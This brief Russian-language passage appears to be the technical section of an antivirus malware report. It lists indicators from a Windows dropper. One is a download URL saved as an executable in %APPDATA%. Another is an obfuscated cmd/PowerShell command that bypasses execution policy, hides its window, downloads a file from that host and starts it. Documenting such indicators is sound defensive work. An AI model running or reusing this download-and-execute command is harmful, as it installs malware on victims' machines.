Техническая информация
- http://vanrityunity.tp/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWERSHelL.exe -exECutIONPOlicY BypASs -NOprOFiLE -wInDOwstyLE HIdDEN (NeW-bjECT SyStEM.neT.wEbcLIENT).dOWNLOAdFIlE('http://vanrityunity.tp/search.php','%APpDatA%.ExE');STart-prcESS...
- '<SYSTEM32>\cmd.exe' /C "POWERSHelL.exe -exECutIONPOlicY BypASs -NOprOFiLE -wInDOwstyLE HIdDEN (NeW-bjECT SyStEM.neT.wEbcLIENT).dOWNLOAdFIlE('http://vanrityunity.tp/search.php','%APpDatA%.ExE');STart-prcESS...' (со скрытым окном)